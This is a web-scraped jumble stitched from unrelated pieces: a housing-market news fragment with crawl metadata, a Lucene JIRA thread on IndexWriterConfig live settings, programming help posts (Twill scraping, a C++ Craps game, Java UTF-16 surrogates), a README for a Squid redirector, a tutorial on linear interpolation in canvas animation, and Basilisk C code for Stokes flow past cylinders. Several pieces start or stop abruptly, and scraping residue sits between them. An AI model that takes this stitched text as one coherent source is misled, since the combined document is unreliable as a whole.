While new home construction is the principal consuming engine for chemicals in the housing sector, the state of the existing homes sector is important because those sales take older residences off the market and help generate demand for new construction.
NAR said the inventory of existing homes available for sale fell by 9.2% in December from November to 2.38m units, which represents a 6.2-month supply at current sales rates. That figure is nearing a more normal inventory level, which in a non-recession market typically would be a four- to six-month supply.
The 2.38m existing homes for sale are down considerably from the record of just over 4m units on the market in July | http://www.icis.com/Articles/2012/01/20/9525797/us-existing-home-sales-jump-5-in-dec-seen-as-sign-of-recovery.html | CC-MAIN-2014-52 | refinedweb | 379 | 56.96 |
Details
Description:
* <b>NOTE:</b> some settings may be changed on the * returned {@link IndexWriterConfig}, and will take * effect in the current IndexWriter instance. See the * javadocs for the specific setters in {@link * IndexWriterConfig} for details. idea?
Activity
I don't think we should add another Config object, making things complicated for such a very very expert use case.
Even ordinary users need to use IWC, and 99% of them don't care about changing things live.
I'm not proposing to complicate matters for 99.9% of the users. On the contrary – users will still do:
IndexWriterConfig config = new IndexWriterConfig(...); // configure it IndexWriter writer = new IndexWriter(dir, config);
Only the expert users who will want to change some settings "live", will do:
Config conf = writer.getConfig(); // NOTE: it's a different type conf.setSomething();
Config can be an IW internal type and most users won't even be aware of it. Today we document that the given IWC to IW ctor is cloned and it will remain as such. Only instead of being cloned to an IWC type, it will be cloned to a Config (or LiveConfig) type.
IWC documentation isn't changed, IW.getConfig changes by removing that NOTE, and if you care about "lively" configure IW, you can do so through LiveConfig. And we can test that type too !
Right, but i suppose changing live settings isnt necessarily the only use case for writer.getConfig() ?
Today someone can take the config off of there and set it on another writer (it will be privately cloned).
so i think if we want to do it this way, we could just keep getConfig as is, and add getLiveConfig which
actually returns the same object, just cast through that interface.
ok actually i was partially wrong, one can no longer actually use the IWC from a writer since its marked as "owned".
But they can still grab it and look at stuff like getIndexDeletionPolicy, even though thats not live.
I guess to be less confusing we should add getLiveConfig and just remove getConfig completely?
Today someone can take the config off of there and set it on another writer (it will be privately cloned)
True, but I'm not aware of such use, and still someone can cache the IWC himself and pass it to multiple writers?
If getConfig() returns an IWC which has setters(), that'll confuse the user for sure, because those settings won't take effect.
I prefer that getConfig return the new LiveConfig type, with few setters and all getters (i.e. all getXYZ from IWC), and let whoever want to pass the same IWC instance to other writers handle it himself.
Alternatively, we can add another ctor which takes a LiveConfig object, that is returned from getConfig(), but I prefer to avoid that until someone actually tells us that he shares the same IWC with other writers, and he cannot cache it himself?
sorry, instead of nuking getConfig make it pkg-private. Things like RandomIndexWriter want to peek into some
un-live settings (like codec), I think we should still be able to look at these things for tests
I guess to be less confusing we should add getLiveConfig and just remove getConfig completely?
Yes that's the proposal - either getConfig or getLiveConfig, but return a LiveConfig object with all the getters of IWC, and only the setters that we want to support.
True, but I'm not aware of such use, and still someone can cache the IWC himself and pass it to multiple writers?
I'm just talking about the general issue that IW.getConfig is not only used to change settings live.
Today our tests use this to peek at the settings on the IW (see my RandomIndexWriter example)...
Phew, that was tricky, but here's the end result – refactored IndexWriterConfig into the following class hierarchy:
- ReadOnlyConfig
- AbstractLiveConfig
- LiveConfig
- IndexWriterConfig
- IndexWriter now takes ReadOnlyConfig, which is an abstract class with all abstract getters.
- LiveConfig is returned from IndexWriter.getConfig(), and is initialized with the ReadOnlyConfig given to IW. It overrides all getters to delegate the call to the given (cloned) config. It is public but with a package-private ctor.
- IndexWriterConfig is still the entry object for users to initialize an IndexWriter, and adds its own setters for the non-live settings.
- The AbstractLiveConfig in the middle is used for generics and keeping the builder pattern. That way, LiveConfig.set1() and IndexWriterConfig.set1() return the proper type (LiveConfig or IndexWriterConfig respectively).
I would have liked IW to keep getting IWC in its ctor, but there's one test that prevents it: TestIndexWriterConfig.testIWCInvalidReuse, which initializes an IW, call getConfig and passes it to another IW (which is invalid). I don't know why it's invalid, as IW clones the given IWC, but that is one reason why I had to factor the getters out to a shared ReadOnlyConfig.
ROC is not that bad though – it kind of protects against IW changing the given config ...
At least, no user code should change following these changes, except from changing the variable type used to cache IW.getConfig() to LiveConfig, which is what we want.
I had a brief chat about IWC.usedByIW with Mike (was introduced in
LUCENE-4084), and we both agree it's not needed anymore, as now with IW.getConfig() returning LiveConfig and IW taking IWC in its ctor, no one can pass the same instance returned from getConfig to a new IW, and so the relevant test can be nuked, together with that AtomicBoolean.
I'll nuke them then, and absorb ReadOnlyConfig into AbstractLiveConfig and stick with just two concrete clases: LiveConfig returned from IW.getConfig and IWC given to its ctor.
I'll post a patch probably tomorrow.
I think the class hierarchy/generics are too tricky.
Why do we need generics?
That's certified and suggested by the generics policeman. The generics are needed to make the builder API work correct (compare Enum<T extends Enum<T>>)
Its not certified by me. Its too confusing for a class everyone must use.
I dont care about the builder pattern, builder pattern simply isnt worth it for confusing generics on a config class.
If we remove IWC's chained setters (return void), can we simplify this?
We could, I am against, I love IndexWriterConfig!
I love it too, and the changes would be too horrible. We use this builder pattern everywhere. Remember, the changes in this issue are to not confuse people, that's it. They don't cause users to change their code almost at all.
I don't quite understand what's the issue with the generics. If you don't look at IWC / LC code, it's not visible at all. I mean, in your application code, you won't see any generics.
The generics is because I wanted to not duplicate code between LiveConfig and IWC, so that the live settings share the same setXYZ code. First I thought to write a separate LiveConfig class, but then the setter methods need to be duplicated. I'll take another look – perhaps IWC.setRAMBuffer for instance can just delegate to a private LiveConfig instance.setter. That will keep the APIs without generics, with perhaps so jdoc duplication ...
I can take a stab at something like that, or if you have another proposal. I don't want to let go of the builder pattern though.
I think the generics here are not very complicated and also not really user facing. its only a tool here to make things nice for the user I think that justifies it. so I think this looks good though.
I dislike chaining ("return this" from setters) since it's so easily and often abused. Here's an example from Lucene's tests:
IndexWriter w = new MockIndexWriter(dir, newIndexWriterConfig( TEST_VERSION_CURRENT, new MockAnalyzer(random())).setOpenMode(OpenMode.CREATE) .setRAMBufferSizeMB(0.1).setMaxBufferedDocs(maxBufferedDocs).setIndexerThreadPool(new ThreadAffinityDocumentsWriterThreadPool(maxThreadStates)) .setReaderPooling(doReaderPooling).setMergePolicy(newLogMergePolicy()));
I don't quite understand what's the issue with the generics. If you don't look at IWC / LC code, it's not visible at all. I mean, in your application code, you won't see any generics.
It's also important to keep our non-user-facing sources simple too, so
our source code is approachable to new users.
Having 4 classes, plus generics, for what ought to be a simple
configuration class, is too much in my opinion. I'd rather stick with
javadocs explaining what can and cannot be changed live. This (wanting
to change live seettings) is expert usage...
Hopefully, we can simplify the approach here.
Patch removes ReadOnlyConfig and the tests from TestIWC that ensure that the same IWC instance isn't shared between IWs. This is no longer needed, since now IW takes IWC and returns LiveConfig, so it cannot be passed to another IW, simply because the compiler won't allow it.
This is a better solution IMO than maintaining an AtomicBoolean + tests that enforce that + RuntimeException that is known only during testing, or worse.
I don't think we should disable the Builder pattern - our tests use it, and I bet users use it too (my code does). If it bothers anyone, he can separately change all our tests to call the setters one per line.
The generics, as Simon said, are just a tool to save code duplication and make sure that IWC and LC have the same getter signatures, and share the live setters.
The fact is, no user code will change by that change, and really, no Lucene developer should be affected by it either – this is just a configuration class, adding set/get methods to it will be as easy as they were before. But now compile-wise, we don't let even expert users change non-live settings.
If there are no objections, I'd like to commit this by tomorrow.
I still feel the same way as before. I'm sorry you don't agree with me, but please don't shove the change in.
Please don't rush this Shai.
I still don't like the added complexity of the current patch. I do
think compile-time checking of live configuration would be neat/nice to
have (for expert users) but not at the cost of the added complexity
(abstract classes, generics) of the current patch.
This is too much for what should be (is, today) a simple configuration
class. I'd rather keep what we have today.
Maybe we can somehow simplify the patch while enabling strong type
checking of what's live and what isn't? Or, we can enable the type
checking, but dynamically at runtime; this way at least you'd get an
exception if you tried to change something. Or, stop chainging (return
void from all setters)... then the subclassing is straightforward. Or,
we simply improve javadocs. All of these options would be an
improvement.
Or, we just keep what we have today... changing live settings is an
expert use case. We shouldn't make our code more complex for it.
You've already done the hardest part here (figuring out what is live and
what isn't)!
Sorry if it came across like that, but I don't mean to rush or shove this issue in. I'm usually after consensus and I appreciate your feedback.
I took another look at this, and found a solution without generics. Funny thing is, that's the first solution that came to my mind, but I guess at the time it didn't picture well enough, so I discarded it
.
Now we have only LiveConfig and IndexWriterConfig, where IWC extends LC and overrides all setter methods. The "live" setters are overridden just to return IWC type, and call super.setXYZ(). So we don't have code dup, and whoever has IWC type at hand, will receive IWC back from all set() methods.
LC is public class but with package-private ctors, one that takes IWC (used by IndexWriter) and one that takes Analyzer+Version, to match IWC's. It contains all "live" members as private, and the others as protected, so that IWC can set them. Since it cannot be sub-classed outside the package, this is 'safe'.
The only thing that bothers me, and I'm not sure if it can be fixed, but this is not critical either, is TestIWC.testSettersChaining(). For some reason, even though I override the setters from LC in IWC, and set their return type to IWC, reflection still returns their return type as LiveConfig. This only affects the test, since if I do:
IndexWriterConfig conf; conf.setMaxBufferedDocs(); // or any other set from LC
the return type is IWC.
If anyone knows how to solve it, please let me know, otherwise we'll just have to live with the modification to the test, and the chance that future "live" setters may be incorrectly overridden by IWC to not return IWC type That is not an error, just a convenience.
Besides that, and if I follow your comments and concerns properly, I think this is now ready to commit – there's no extra complexity (generics, 3 classes etc.), and with better compile time protection against misuse.
Hi Shai,
ignore all methods with isSynthetic() set (that are covariant overrides compatibility methods, access$xx() methods for access to private fields/ctors/...).
Thanks Uwe. The test is now fixed by saving all 'synthetic' methods and all 'setter' methods and verifying in the end that all of them were received from IWC too.
Can we override all methods so the javadocs aren't confusing.
I don't want the methods split in the javadocs between IWC and LiveConfig: LiveConfig is expert and should be a subset, not a portion.
Also can we rename it to LiveIndexWriterConfig? LiveConfig is too generic I think...
Can we override all methods so the javadocs aren't confusing.
Good idea! Done
Also can we rename it to LiveIndexWriterConfig?
Done
thanks, +1
Thanks Robert. I'll wait until Sunday and commit it.
Hmm we are no longer cloning the IWC passed into IW? Maybe we shouldn't remove testReuse?
Good catch Mike ! It went away in the last changes. I re-added testReuse, with asserting that e.g. the MP instances returned from LiveIWC are not the same.
I re-added testReuse, with asserting that e.g. the MP instances returned from LiveIWC are not the same.
Thanks!
Shouldn't clone() be protected in LiveIndexWriterConfig and public only in IndexWriterConfig?
Ie, users should never have any reason to clone the live config?
Shouldn't clone() be protected in LiveIndexWriterConfig and public only in IndexWriterConfig?
I guess you're right. In fact, I think that LiveIWC should not even be Cloneable, only IWC should? I'll take a look later when I'm near the code.
Patch removes Cloenable from LiveIWC. Now only IWC is Cloenable.
Committed revision 1351225 (trunk) and revision 1351229 (4x).
Thanks all for your comments !
CHANGES.txt is mangled
The 4.x commit also breaks the builds, looks like duplicate merges to same file.
The 4.x commit also breaks the builds, looks like duplicate merges to same file.
This was solved by cleaning workspace on Apache's Jenkins. Must have been a SVN problem.
bulk cleanup of 4.0-ALPHA / 4.0 Jira versioning. all bulk edited issues have hoss20120711-bulk-40-change in a comment
This should have been changed back to 'resolved' a long time ago. I guess I missed it.
I don't think we should add another Config object, making things complicated for such a very very expert use case.
Even ordinary users need to use IWC, and 99% of them don't care about changing things live.
I'm also nervous about documenting which things can/cannot be changed live unless there are unit tests for each one.
If we want to refactor indexwriter in some way that really cleans it up, but makes something "un-live", then I think
thats totally fair game and we should be able to do it, but the docs shouldnt be wrong. | https://issues.apache.org/jira/browse/LUCENE-4132?attachmentOrder=desc | CC-MAIN-2015-11 | refinedweb | 2,686 | 73.58 |
Question:
Consider the following code:
byte aBytes[] = { (byte)0xff,0x01,0,0, (byte)0xd9,(byte)0x65, (byte)0x03,(byte)0x04, (byte)0x05, (byte)0x06, (byte)0x07, (byte)0x17,(byte)0x33, (byte)0x74, (byte)0x6f, 0, 1, 2, 3, 4, 5, 0 }; String sCompressedBytes = new String(aBytes, "UTF-16"); for (int i=0; i<sCompressedBytes.length; i++) { System.out.println(Integer.toHexString(sCompressedBytes.codePointAt(i))); }
Gets the following incorrect output:
ff01, 0, fffd, 506, 717, 3374, 6f00, 102, 304, 500.
However, if the
0xd9 in the input data is changed to
0x9d, then the following correct output is obtained:
ff01, 0, 9d65, 304, 506, 717, 3374, 6f00, 102, 304, 500.
I realize that the functionality is because of the fact that the byte
0xd9 is a high-surrogate Unicode marker.
Question: Is there a way to feed, identify and extract surrogate bytes (
0xd800 to
0xdfff) in a Java Unicode string?
Thanks
Solution:1
Is there a way to feed, identify and extract surrogate bytes (0xd800 to 0xdfff) in a Java Unicode string?
Just because no one has mentioned it, I'll point out that the Character class includes the methods for working with surrogate pairs. E.g. isHighSurrogate(char), codePointAt(CharSequence, int) and toChars(int). I realise that this is besides the point of the stated problem.
new String(aBytes, "UTF-16");
This is a decoding operation that will transform the input data. I'm pretty sure it is not legal because the chosen decoding operation requires the input to start with either 0xfe 0xff or 0xff 0xfe (the byte order mark). In addition, not every possible byte value can be decoded correctly because UTF-16 is a variable width encoding.
If you wanted a symmetric transformation of arbitrary bytes to String and back, you are better off with an 8-bit, single-byte encoding because every byte value is a valid character:
Charset iso8859_15 = Charset.forName("ISO-8859-15"); byte[] data = new byte[256]; for (int i = Byte.MIN_VALUE; i <= Byte.MAX_VALUE; i++) { data[i - Byte.MIN_VALUE] = (byte) i; } String asString = new String(data, iso8859_15); byte[] encoded = asString.getBytes(iso8859_15); System.out.println(Arrays.equals(data, encoded));
Note: the number of characters is going to equal the number of bytes (doubling the size of the data); the resultant string isn't necessarily going to be printable (containing as it might, a bunch of control characters).
I'm with Jon, though - putting arbitrary byte sequences into Java strings is almost always a bad idea.
Solution:2
EDIT: This addresses the question from the comment
If you want to encode arbitrary binary data in a string, you should not use a normal text encoding. You don't have valid text in that encoding - you just have arbitrary binary data.
Base64 is the way to go here. There's no base64 support directly in Java (in a public class, anyway) but there are various 3rd party libraries you can use, such as the one in the Apache Commons Codec library.
Yes, base64 will increase the size of the data - but it'll allow you to decode it later without losing information.
EDIT: This addresses the original question
I believe that the problem is that you haven't specified a proper surrogate pair. You should specify bytes representing a low surrogate and then a high surrogate. After that, you should be able to extra the appropriate code point. In your case, you've given a low surrogate on its own.
Here's code to demonstrate this:
public class Test { public static void main(String[] args) throws Exception // Just for simplicity { byte[] data = { 0, 0x41, // A (byte) 0xD8, 1, // High surrogate (byte) 0xDC, 2, // Low surrogate 0, 0x42, // B }; String text = new String(data, "UTF-16"); System.out.printf("%x\r\n", text.codePointAt(0)); System.out.printf("%x\r\n", text.codePointAt(1)); // Code point at 2 is part of the surrogate pair System.out.printf("%x\r\n", text.codePointAt(3)); } }
Output:
41 10402 42
Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
EmoticonEmoticon | http://www.toontricks.com/2018/06/tutorial-handling-unicode-surrogate.html | CC-MAIN-2018-43 | refinedweb | 682 | 52.9 |
I have a twill script that I am trying to use to get the html code from a web page and output to a text file. The problem I have is that all the code does not show up in my text file. The actual parts I need are left out. When I go to the web page manually and do "View, Page Source" I can see all the information. Here is a sample of the script I am using (website, username and password have been changed.
import twill, string, os
import csv
import urllib2
from twill import get_browser
b = get_browser()
from twill.commands import *
b.go ("")
username="user"
password="password"
formvalue ("form1", "name", "$username")
formvalue ("form1", "password", "$password")
b.submit
b.go ("")
redirect_output ("c:\testhtml.txt")
html=b.get_html()
html
Does anyone know what the problem is? | https://www.daniweb.com/programming/software-development/threads/289749/twill-get-html | CC-MAIN-2016-50 | refinedweb | 138 | 75.4 |
squid3_sentry
squid3 redirect_program
Want to see pretty graphs? Log in now!Want to see pretty graphs? Log in now!
npm install squid3_sentry
squid3_sentry
a redirect_program for squid3 (like squidGuard, but more flexible)
Highlights
- Pure Javascript
- Easily extendable
- Rich set of predefined rule templates
- LDAP compatible
- Dynamic rule injection (no reload necessary)
Dependencies
- Node.js
- Squid3
- Optional: LDAP Server (squid with user auth. e.g. ntlm)
- Optional: Redis Server (dynamic rules and large domains lists e.g. shallalist)
Install sentry
Install Sentry globally:
npm install squid3_sentry -g
Or install it locally:
npm install squid3_sentry
Configuration (sentry)
via params
For a list of all params run
$ sentry --help
via config file
Config files need to be written in json (See examples folder)
Params:
name: The name of your instance. This is optional if you just have one squid instance!
redirect: The url to redirect the user if something is blocked
mode: Global mode for
redirector
rewrite. See
modein rules definition.
log: Path to the log file. Bunyan is used as a logger.
log_level: Use
error,
warnor
info. Default is
error.
cache_time: Cache time in milliseconds. Cache will be cleated after that time (e.g. 300000 for 5 mins)
timeout: The timeout per request in milliseconds.
range: This will used for the balancer only (See Balancer)
ldap url: The url to your ldap server (e.g.
ldap://domain.local)
ldap dn: The path to the user which will query your ldap directory (e.g.
CN=MyUser,CN=Users,DC=domain,DC=local)
ldap password: The password for that user
ldap base: The base path for all searches
redis host: url or domain of your redis host (e.g.
localhost)
redis port: The port of your redis server
redis password: If you use redis authentication.
rule_sources: Array of sources. Currently only 'config' and 'redis' is available. The rules are positioned depending on the source position in the array
rules: Array of rule definitions. (only via config file)
for debugging:
measure_times: The amount of time for every request will be messured. The times are visible in the debugger (See Live Debugging)
dry_run: Runs sentry in test mode. Every request is allowed, but sentry still checks it's rules! (See Live Debugging)
Configuration (squid3)
Add the following to your
squid.conf
redirect_program sentry your/config/file.json redirect_children 1 redirect_concurrency 100
Rules
The first rule that matches (e.g. all given criteria matches) will be executed (Deny or Allow).
The following rule will deny all requests and squid will redirect all http connections to the globally defined
redirect address:
{ name: 'rule1', allowed: false }
To define a custom redirect address:
{ name: 'rule1', allowed: false, redirect: 'my.custom.redirec.com' }
The following configuration options are available:
name: Name of the rule (For debugging/verbode mode only). Default: rule
allowed: Deny or allow the url (e.g. black- or whitelist). Default: false
mode: Instead of redirecting a browser to another url (302 HTTP header) you could set it to
rewriteto tell squid to load another page instead of redirecting the browser
redirect: The redirect or rewrite url
Redirect config
You could use the following placeholders:
[url]: Current url
[domain]: Current Domain
[name]: Matching rule name
[ip]: IP of the incomming connection
[username]: Username of the incomming connection (if squid uses authentication)
[method]: HTTP method. e.g. GET, POST,..
Default criteria
You could configure your rules with any of the following criteria:
categories: Array of category names. A category is a list of domains and/or urls stored in redis. (See shallalist import)
category_files: Same as categories, but expects a file paths with domains and/or urls. These files will be stored in redis and watched for changes
file_types: Array of filet ypes (e.g.
['swf', 'flv'])
ips: Array of ips (e.g.
['10.20.30.0/24', '10.55.11.33'])
matches: Array of wildcard matches (e.g.
['*goog*'])
groups: Array of LDAP groups. The full LDAP path is expected (e.g.
['CN=MyGroup,CN=Users,DC=domain,DC=local'])
users: Array of usernames
ous: Array of LDAP OUs. The full LDAP path is expected (e.g.
['OU=Development,DC=domain,DC=local'])
times: Array of objects in the following format: {from: '08:00', to:'17:00', week_day: 1}. The following params are available
- from: From time (24h)
- to: To time (24h)
- week_day: JS Date week date
- day
- month
- year
Custom rule definitions
To extend sentry and add custom rules take a look at
lib/rules/
Example rule which will deny every second request
Squid.start(config); Squid.core.addRuleDefinition({ name: 'my_rule_def', //will be called once for every rule - in the context of the rule. config: function(options){ //This rule definition is active (filter will be called!) this.types.push('my_rule_def'); this.allow_next = true; }, //will be called for every request for every rule where my_rule_def is active filter: function(options, callback){ //Return true if the rule definition matches. callback(null, this.allow_next); //Alternate every request this.allow_next = !this.allow_next; } }); //Add a rule if there isn't any defined Squid.core.addRule({ allowed: false });
Shallalist import
Use the
import script to import shallalist into redis
$ import path/to/shallalist
Live Debugging
Use the
debugger script for life debugging
$ debugger config.json
Balancer
Use the
balancer script for round robin style balancing.
The following command will start a balancer with 3 sentry processes:
$ balancer config.json config.json config.json
You can also use the
balancer script to create a separate context for different subnets.
E.g. 10.20.30.0/24 should have a different set of rules than 192.168.0.0/24.
Create a config file for every subnet and put the subnet definition into the
range config option and start the blancer with the following command:
$ balancer subnet1.json subnet2.json | https://www.npmjs.org/package/squid3_sentry | CC-MAIN-2014-15 | refinedweb | 954 | 56.86 |
by Nash Vail
Understanding Linear Interpolation in UI Animation
In traditional (hand-drawn) animation, a senior or key artist draws keyframes that define the motion.
An assistant, generally an intern or a junior artist, then draws the necessary inbetweens for the scene. The job of the assistant, also called an inbetweener, is to make transitions between key poses look smooth and natural.
Inbetweens are necessary since animations without them appear choppy. Unfortunately, drawing in-betweens is more or less grunt work. But it’s the twenty-first century, and we have computers that can handle this type of task.
Remember what teachers told you in grade school about computers being dumb? Computers need to be told the exact sequence of steps to perform an action. Today we’ll look at one such sequence of steps, or algorithm, that helps the computer draw necessary inbetweens to create a smooth animation.
I’ll be using HTML5 canvas and JavaScript to illustrate the algorithm. However, you’ll be able to read and understand the article even if you aren’t familiar with them.
Intent
Our goal is simple, to animate a ball from point A
(startX, startY) to B
(endX, endY).
If this scene were passed to a studio that does traditional animation, the senior artist would draw the following key poses…
…and then pass the drawing board to a junior artist to draw inbetweens like so.
For our situation, there is no animation studio nor do we have junior artists. All we have is a goal, a computer, and the ability to write some code.
Approach
The HTML code is simple, we only need one line.
<canvas id=”canvas”></canvas>
This part of the JavaScript code (shown below) simply grabs
<canvas/> from the Document Object Model (DOM),
gets context, and sets the width and height property of the canvas to match the viewport.
const canvas = document.getElementById(‘canvas’), context = canvas.getContext(‘2d’), width = canvas.width = window.innerWidth, height = canvas.height = window.innerHeight;
The function below draws a green solid circle of radius
radius at
x and
y coordinates.
function drawBall(x, y, radius) { context.beginPath(); context.fillStyle = ‘#66DA79’; context.arc(x, y, radius, 0, 2 * Math.PI, false); context.fill();}
All of the above code is boilerplate to set up our animation, here’s the juicy part.
// Point Alet startX = 50, startY = 50;
// Point Blet endX = 420, endY = 380;
let x = startX, y = startY;
update();function update() { context.clearRect(0, 0, width, height); drawBall(x, y, 30); requestAnimationFrame(update);}
First of all, notice the
update function being called right above its declaration. Second of all, notice
requestAnimationFrame(update) which calls
update repeatedly.
Flipbook animation is a good analogy for the kind of program we’re writing. Just like repeatedly flipping through a flipbook creates the illusion of motion, repeatedly calling the
update function creates the illusion of motion for our green ball.
One thing to note about the code above is that “update” is just a name. The function could have been named anything else. Some programmers like the names
nextFrame,
loop,
draw, or
flip because the function is repeatedly called. The important part is what the function does.
On each subsequent call of
update, we expect the function to draw a slightly different image on the canvas than the previous one.
Our current implementation of
update draws the ball at the same exact position on each call
drawBall(x, y, 30). There is no animation, but let’s change that. Below is a pen that contains the code we have written so far, you can open it and follow along.
On each iteration of
update let’s go ahead and increment the value of
x and
y and see the kind of animation it creates.
function update() { context.clearRect(0, 0, width, height); drawBall(x, y, 30); x++; y++; requestAnimationFrame(update);}
Each iteration moves the ball forward in both the x and y directions, and repeated calls of
update results in the animation as shown.
Heres’ the deal though, our intent was to move the ball from a start position to an end position. But we’re doing absolutely nothing about stopping the ball at an end position. Let’s fix that.
One obvious solution is to only increment the coordinates when they are smaller than
endX and
endY values. This way, once the ball crosses
endX, endY its coordinates will stop updating and the ball will stop.
function update() { context.clearRect(0, 0, width, height); drawBall(x, y, 30); if(x <= endX && y <= endY) { x++; y++; } requestAnimationFrame(update);}
There’s an error in this approach though. Do you see it?
The problem here is that you cannot make the ball reach any end coordinate you want just by incrementing
x and
y values by
1. For example, consider end coordinates
(500, 500), of course if you start at
(0, 0) and add
1 to
x and
y, they will eventually get to
(500, 500). But what if I chose
(432, 373) as end coordinates?
Using the above approach, you can only reach points lying in a straight line 45 degrees from the horizontal axis.
Now you can use trigonometry and fancy math to calculate precise amounts that
x and
y should be incremented by to reach any coordinate you want. But you don’t need to do that when you have linear interpolation.
Approach with linear interpolation
Here’s what linear interpolation function a.k.a
lerp looks like.
function lerp(min, max, fraction) { return (max — min) * fraction + min;}
To understand what linear interpolation does, consider a slider with a
min value on the left end and a
max value on the right end.
The next thing we need to choose is
fraction.
lerp takes
fraction and converts that to a value between
min and
max.
When I put
0.5 in the
lerp formula — no surprises — it translates to 50. This is exactly the halfway point between
0 (min) and
100 (max).
Similarly, if we choose another value for
fraction say
0.85…
And if we let
fraction = 0,
lerp will output
0 (min) and on
fraction = 1,
lerp will produce
100 (max).
I chose 0 and 100 as
min and
max to keep this example simple, but
lerp will work for any arbitrary choice of
min and
max.
For values of
fraction between
0 and
1,
lerp allows you to interpolate between
min and
max. Or in other words, traverse between
min and
max values, where choosing
0 for
fraction puts you at
min, choosing
1 puts you at
max and for any other value between
0 and
1, puts you anywhere between
min and
max. You can also see
min and
max as key poses, like in traditional animation, and
lerp outputs as inbetweens ;-).
Alright, but what if someone gives a value outside the bounds of
0 and
1 as
fraction to
lerp? You see the formula for
lerp is extremely straightforward with most basic of mathematical operations. There’s no trick or bad values here, just imagine extending the slider in both directions. Whatever value for
fraction is supplied,
lerp will produce a logical result. We shouldn’t pay much thought to bad values here though, what we should think about is how all of this maps to animating the ball.
If you’re following along go ahead and change the
update function to match the following code. Also don’t forget to add in the
lerp function we defined at the beginning of this section.
function update() { context.clearRect(0, 0, width, height); drawBall(x, y, 30); x = lerp(x, endX, 0.1); y = lerp(y, endY, 0.1); requestAnimationFrame(update);}
Here’s a pen of what our program looks like now. Try clicking around :)
Smooth right? Here’s how
lerp helps to improve the animation.
In the code, notice the variables
x and
y — which are initially set to
startX and
startY— mark the current position of the ball in any frame. Also my choice of
0.1 as
fraction is arbitrary, you can choose any fractional value you want. Keep in mind that your choice of
fraction affects the speed of the animation.
In every frame
x and
endX are taken as
min and
max and interpolated with
0.1 as
fraction to obtain a new value for
x. Similarly
y and
endY are used as
min and
max to obtain a new value for
y using
0.1 as fraction.
The ball is then drawn at the newly calculated
(x, y) coordinate.
These steps are repeated until
x becomes
endX and
y becomes
endY in which case
min = max. When
min and
max become equal
lerp throws the exact same value(min/max) for any further frames thus stopping the animation.
And that is how you use linear interpolation to smoothly animate a ball.
This short article covers a lot. We started by defining terms like key poses and inbetweens. Then we tried a trivial approach for drawing inbetweens and noticed its limitations. Finally, with linear interpolation, we were able to achieve our intent.
I hope all the math made sense to you. Feel free to play with linear interpolation even more. This article was inspired by Rachel Smith’s post on CodePen. Rachel’s post has many more examples, be sure to check it out.
Looking for more? I publish regularly on my blog at nashvail.me. See you there, have a good one!
| https://www.freecodecamp.org/news/understanding-linear-interpolation-in-ui-animations-74701eb9957c/ | CC-MAIN-2019-43 | refinedweb | 1,573 | 65.73 |
I am doing a Craps program in my class. I think this is a very common program for beginners but it seems to be different everywhere I see it. All I need it to do is the user inputs the first total, it tells them if they win or lose, if not, it prompts a second total and checks for a winner. If it is not a winner, it prompts for another roll from the user until the user wins. I got my code to compile correctly but I have some problems.
Problem 1: If the first number is a winner or a loser, it prints "You win!!!" or "You Lose!!!" and then it does not end the program. I have to actually close the program myself.
Problem 2: If the first number is neither a winner or a loser, it prompts for a second roll. If the second roll is the same as the first it says "You win!!!" If not, it should ask for another roll, instead it asks for another roll infinitly, I have to close the program.
Here is my code, I have been working with it for a while and I would really appreciate any help.
Code:// File: CRAPS.cpp // Author: Emil // Class: TR 5pm // Purpose: To simulate a game of Craps given total on first dice roll // and possibly a second dice roll. #include <iostream> using namespace std; int main() { float first_total, second_total, roll_total; // Prompt for and read in total from first dice roll cout << "Enter total from first dice roll (2-12)... "; cin >> first_total; if((first_total == 7) || (first_total == 11)) cout << "You Win!!!"; else if((first_total == 2) || (first_total == 3) || (first_total == 12)) cout << "You Lose!!!"; else cout << "Please roll again and enter total of second roll (2-12): "; cin >> second_total; if(second_total == first_total) cout << "You win!!!"; else if(second_total == 7) cout << "You lose!!!"; else while ((second_total != 7) || (second_total == first_total)) cout << "Please roll again and enter total on this roll (2-12): "; cin >> roll_total; second_total = roll_total; return (0); } | http://cboard.cprogramming.com/cplusplus-programming/101896-need-help-craps-program.html | CC-MAIN-2015-22 | refinedweb | 332 | 73.47 |
src/test/cylinders.c
Stokes flow past a periodic array of cylinders
We compare the numerical results with the solution given by the multipole expansion of Sangani and Acrivos, 1982.
#include "embed.h" #include "navier-stokes/centered.h" #include "view.h"
This is Table 1 of Sangani and Acrivos, 1982, where the first column is the volume fraction of the cylinders and the second column is the non-dimensional drag force per unit length of cylinder with the dynamic vicosity and the average fluid velocity.
static double sangani[9][2] = { {0.05, 15.56}, {0.10, 24.83}, {0.20, 51.53}, {0.30, 102.90}, {0.40, 217.89}, {0.50, 532.55}, {0.60, 1.763e3}, {0.70, 1.352e4}, {0.75, 1.263e5} };
We will vary the maximum level of refinement, nc is the index of the case in the table above, the radius of the cylinder will be computed using the volume fraction .
int maxlevel = 6, nc; double radius;
This function defines the embedded volume and face fractions.
void cylinder (scalar cs, face vector fs) { vertex scalar φ[]; foreach_vertex() φ[] = sq(x) + sq(y) - sq(radius); fractions (φ, cs, fs); } int main() {
The domain is the periodic unit square, centered on the origin.
size (1.); origin (-L0/2., -L0/2.); = 1e-3; TOLERANCE = HUGE; NITERMIN = 5;
We do the 9 cases computed by Sangani & Acrivos. The radius is computed from the volume fraction.
for (nc = 0; nc < 9; nc++) { maxlevel = 6; N = 1 << maxlevel; radius = sqrt(sq(L0)*sangani[nc][0]/π); run(); } }
We need an extra field to track convergence.
scalar un[]; event init (t = 0) {
We initialize the embedded geometry.
cylinder (cs, fs);
And set acceleration and viscosityout, " (i > 0 && du < 1e-3) {
We output the non-dimensional force per unit length on the cylinder , together with the corresponding value from Sangani & Acrivos and the relative error.
stats s = statsf(u.x); double Φ = 1. - s.volume/sq(L0); double U = s.sum/s.volume; double F = sq(L0)/(1. - Φ); fprintf (ferr, "%d %g %g %g %g\n", maxlevel, sangani[nc][0], F/U, sangani[nc][1], fabs(F/U - sangani[nc][1])/sangani[nc][1]);
We dump the simulation and draw the mesh for one of the cases.
dump(); if (maxlevel == 9 && nc == 8) { view (fov = 9.78488, tx = 0.250594, ty = -0.250165); draw_vof ("cs", "fs", lc = {1,0,0}, lw = 2); squares ("u.x", linear = 1, spread = -1); cells(); save ("mesh.png"); }
We stop at level 9.
if (maxlevel == 9) return 1; /* stop */
We refine the converged solution to get the initial guess for the finer level. We also reset the embedded fractions to avoid interpolation errors on the geometry.
